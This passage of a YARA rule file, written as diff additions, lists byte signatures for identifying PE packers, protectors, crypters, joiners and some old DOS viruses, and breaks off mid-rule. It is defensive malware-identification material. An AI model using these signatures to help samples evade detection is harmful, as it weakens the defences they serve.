+	
+	
+rule CRYPToCRACksPEProtectorV092LukasFleischer
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 01 00 00 00 E8 58 5B 81 E3 00 FF FF FF 66 81 3B 4D 5A 75 37 84 DB 75 33 8B F3 03 ?? ?? 81 3E 50 45 00 00 75 26 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UpackV037Dwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 18 10 00 00 10 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 02 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 14 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 }
+	$a1 = { 60 E8 09 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 5E 87 0E }
+	$a2 = { BE ?? ?? ?? ?? AD 50 FF ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule Obsidiumv13037ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxCompiler
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C C3 83 C3 10 2E 01 1E ?? 02 2E 03 1E ?? 02 53 1E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BJFntv13
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? 3A ?? ?? 1E EB ?? CD 20 9C EB ?? CD 20 EB ?? CD 20 60 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePEtite21emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXShitv01500mhz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }
+	$a1 = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }
+	$a2 = { E8 ?? ?? ?? ?? 5E 83 C6 ?? AD 89 C7 AD 89 C1 AD 30 07 47 E2 ?? AD FF E0 C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule PackmanV0001Bubbasoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 58 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8D ?? ?? 48 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DJoinv07publicxorencryptiondrmist
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C6 05 ?? ?? 40 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoinerSmallbuild033GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 66 33 C3 66 8B C1 58 E8 AC FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AnticrackSoftwareProtectorv109ACProtect
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 83 04 24 06 C3 ?? ?? ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnderGroundCrypterbyBooster2000
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 74 3C 00 11 E8 94 F9 FF FF E8 BF FE FF FF E8 0A F3 FF FF 8B C0 }
+
+condition:
+		$a0
+}
+	
+	
+rule MicroJoiner16coban2k
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 64 8B 38 48 8B C8 F2 AF AF 8B 1F 66 33 DB 66 81 3B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WiseInstallerStubv11010291
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 40 0F 00 00 53 56 57 6A 04 FF 15 F4 30 40 00 FF 15 74 30 40 00 8A 08 89 45 E8 80 F9 22 75 48 8A 48 01 40 89 45 E8 33 F6 84 C9 74 0E 80 F9 22 74 09 8A 48 01 40 89 45 E8 EB EE 80 38 22 75 04 40 89 45 E8 80 38 20 75 09 40 80 38 20 74 FA 89 45 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivateEXEProtector18
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB DC EE 0D 76 D9 D0 8D 16 85 D8 90 D9 D0 }
+
+condition:
+		$a0
+}
+	
+	
+rule SimpleUPXCryptorv3042005multilayerencryptionMANtiCORE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }
+	$a1 = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Themida1201compressedOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv155
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A2 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 ?? 80 40 ?? 90 90 01 85 9E 80 40 ?? BB 2D 12 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PolyCryptPE214b215JLabSoftwareCreationshsigned
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 6F 6C 79 43 72 79 70 74 20 50 45 20 28 63 29 20 32 30 30 34 2D 32 30 30 35 2C 20 4A 4C 61 62 53 6F 66 74 77 61 72 65 2E 00 50 00 43 00 50 00 45 }
+
+condition:
+		$a0
+}
+	
+	
+rule PECompactv156
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 90 40 ?? 87 DD 8B 85 A2 90 40 ?? 01 85 03 90 40 ?? 66 C7 85 ?? 90 40 ?? 90 90 01 85 9E 90 40 ?? BB 2D 12 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PGMPACKv013
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FA 1E 17 50 B4 30 CD 21 3C 02 73 ?? B4 4C CD 21 FC BE ?? ?? BF ?? ?? E8 ?? ?? E8 ?? ?? BB ?? ?? BA ?? ?? 8A C3 8B F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PGMPACKv014
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 17 50 B4 30 CD 21 3C 02 73 ?? B4 4C CD 21 FC BE ?? ?? BF ?? ?? E8 ?? ?? E8 ?? ?? BB ?? ?? BA ?? ?? 8A C3 8B F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner0232Lite003Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 06 FC 1E 07 BE 90 90 90 90 6A 04 68 90 10 90 90 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakePEtite22FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 B8 00 00 00 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MEW10byNorthfox
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }
+
+condition:
+		$a0
+}
+	
+	
+rule theWRAPbyTronDoc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 57 33 C0 89 45 F0 B8 48 D2 4B 00 E8 BC 87 F4 FF BB 04 0B 4D 00 33 C0 55 68 E8 D5 4B 00 64 FF 30 64 89 20 E8 9C F4 FF FF E8 F7 FB FF FF 6A 40 8D 55 F0 A1 F0 ED 4B 00 8B 00 E8 42 2E F7 FF 8B 4D F0 B2 01 A1 F4 C2 40 00 E8 F7 20 F5 FF 8B F0 B2 01 A1 B4 C3 40 00 E8 F1 5B F4 FF 89 03 33 D2 8B 03 E8 42 1E F5 FF 66 B9 02 00 BA FC FF FF FF 8B C6 8B 38 FF 57 0C BA B8 A7 4D 00 B9 04 00 00 00 8B C6 8B 38 FF 57 04 83 3D B8 A7 4D 00 00 0F 84 5E 01 00 00 8B 15 B8 A7 4D 00 83 C2 04 F7 DA 66 B9 02 00 8B C6 8B 38 FF 57 0C 8B 0D B8 A7 4D 00 8B D6 8B 03 E8 2B 1F F5 FF 8B C6 E8 B4 5B F4 FF 33 D2 8B 03 E8 DF 1D F5 FF BA F0 44 4E 00 B9 01 00 00 00 8B 03 8B 30 FF 56 04 80 3D F0 44 4E 00 0A 75 3F BA B8 A7 4D 00 B9 04 00 00 00 8B 03 8B 30 FF 56 04 8B 15 B8 A7 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petitev211
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petitev212
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MaskPEV20yzkzero
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 18 00 00 00 64 8B 18 83 C3 30 C3 40 3E 0F B6 00 C1 E0 ?? 83 C0 ?? 36 01 04 24 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01Morphine12Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 06 00 90 90 90 90 90 90 90 90 EB 08 E8 90 00 00 00 66 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 51 66 90 90 90 59 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EZIPv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 19 32 00 00 E9 7C 2A 00 00 E9 19 24 00 00 E9 FF 23 00 00 E9 1E 2E 00 00 E9 88 2E 00 00 E9 2C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule y0dasCrypterv12
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ChinaProtectdummy
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C3 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 56 8B ?? ?? ?? 6A 40 68 00 10 00 00 8D ?? ?? 50 6A 00 E8 ?? ?? ?? ?? 89 30 83 C0 04 5E C3 8B 44 ?? ?? 56 8D ?? ?? 68 00 40 00 00 FF 36 56 E8 ?? ?? ?? ?? 68 00 80 00 00 6A 00 56 E8 ?? ?? ?? ?? 5E C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule BopCryptv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BD ?? ?? ?? ?? E8 ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MinkeV101Codius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 26 3D 4F 38 C2 82 37 B8 F3 24 42 03 17 9B 3A 83 01 00 00 CC 00 00 00 00 06 00 00 00 01 64 53 74 75 62 00 10 55 54 79 70 65 73 00 00 C7 53 79 73 74 65 6D 00 00 81 53 79 73 49 6E 69 74 00 0C 4B 57 69 6E 64 6F 77 73 00 00 8A 75 46 75 6E 63 74 69 6F 6E 73 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02BorlandDelphiDLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 B4 B8 90 90 90 90 E8 00 00 00 00 E8 00 00 00 00 8D 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule bambam004bedrock
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF ?? ?? ?? ?? 83 C9 FF 33 C0 68 ?? ?? ?? ?? F2 AE F7 D1 49 51 68 ?? ?? ?? ?? E8 11 0A 00 00 83 C4 0C 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 BF ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 49 BF ?? ?? ?? ?? 8B D1 68 ?? ?? ?? ?? C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA BF ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 49 51 68 ?? ?? ?? ?? E8 C0 09 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117DLLLZMAAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 5A 0A 00 00 8D 9D 40 02 00 00 33 FF E8 ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 EB 09 00 00 89 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEtitev22
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEtitev20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEtitev21
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ElicenseSystemV4000ViaTechInc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 63 79 62 00 65 6C 69 63 65 6E 34 30 2E 64 6C 6C 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule VProtectorV10Build20041213testvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 1A 89 40 00 68 56 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Themida18xxOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 }
+	$a1 = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule EXEJoinerv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 C6 00 5C 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MicroJoiner11coban2k
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 0C 70 40 00 BB F8 11 40 00 33 ED 83 EE 04 39 2E 74 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01FSG10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov200b2200b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 00 F2 40 00 68 C4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RAZOR1911encruptor
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? BF ?? ?? 3B FC 72 ?? B4 4C CD 21 BE ?? ?? B9 ?? ?? FD F3 A5 FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElock051tE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 5E 8B FE 68 79 01 00 00 59 EB 01 EB AC 54 E8 03 00 00 00 5C EB 08 8D 64 24 04 FF 64 24 FC 6A 05 D0 2C 24 72 01 E8 01 24 24 5C F7 DC EB 02 CD 20 8D 64 24 FE F7 DC EB 02 CD 20 FE C8 E8 00 00 00 00 32 C1 EB 02 82 0D AA EB 03 82 0D 58 EB 02 1D 7A 49 EB 05 E8 01 00 00 00 7F AE 14 7E A0 77 76 75 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDProtectorBasicProEdition112RandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 20 33 C0 89 41 04 89 41 08 89 41 0C 89 41 10 59 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 33 C0 64 FF 30 64 89 20 9C 80 4C 24 01 01 9D 90 90 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 64 8F 00 58 74 07 75 05 19 32 67 E8 E8 74 27 75 25 EB 00 EB FC 68 39 44 CD 00 59 9C 50 74 0F 75 0D E8 59 C2 04 00 55 8B EC E9 FA FF FF 0E E8 EF FF FF FF 56 57 53 78 03 79 01 E8 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 7B 03 00 00 03 C8 74 C4 75 C2 E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxFaxFreeTopo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FA 06 33 C0 8E C0 B8 ?? ?? 26 ?? ?? ?? ?? 50 8C C8 26 ?? ?? ?? ?? 50 CC 58 9D 58 26 ?? ?? ?? ?? 58 26 ?? ?? ?? ?? 07 FB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02MEW11SE10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Joinersignfrompinch250320072010
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 81 EC 04 01 00 00 8B F4 68 04 01 00 00 56 6A 00 E8 7C 01 00 00 33 C0 6A 00 68 80 00 00 00 6A 03 6A 00 6A 00 68 00 00 00 80 56 E8 50 01 00 00 8B D8 6A 00 6A 00 6A 00 6A 02 6A 00 53 E8 44 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxSK
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { CD 20 B8 03 00 CD 10 51 E8 00 00 5E 83 EE 09 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEStubOEPv1x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 40 48 BE 00 ?? ?? 00 40 48 60 33 C0 B8 ?? ?? ?? 00 FF E0 C3 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule MoleBoxV23XMoleStudiocom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 60 E8 4F 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxHymn1865
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 83 EE 4C FC 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 ?? ?? ?? FB 3B ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? 50 06 56 1E 0E 1F B8 00 C5 CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kkrunchyRyd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BD 08 ?? ?? 00 C7 45 00 ?? ?? ?? 00 FF 4D 08 C6 45 0C 05 8D 7D 14 31 C0 B4 04 89 C1 F3 AB BF ?? ?? ?? 00 57 BE ?? ?? ?? 00 31 C9 41 FF 4D 0C 8D 9C 8D A0 00 00 00 FF D6 10 C9 73 F3 FF 45 0C 91 AA 83 C9 FF 8D 5C 8D 18 FF D6 74 DD E3 17 8D 5D 1C FF D6 74 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECryptv100v101
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 5B 83 EB 05 EB 04 52 4E 44 21 EB 02 CD 20 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CERBERUSv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 2B ED 8C ?? ?? 8C ?? ?? FA E4 ?? 88 ?? ?? 16 07 BF ?? ?? 8E DD 9B F5 B9 ?? ?? FC F3 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor2117StrongbitSoftCompleteDevelopment
+{
+      meta:
+		author="malware-lu"
+strings:
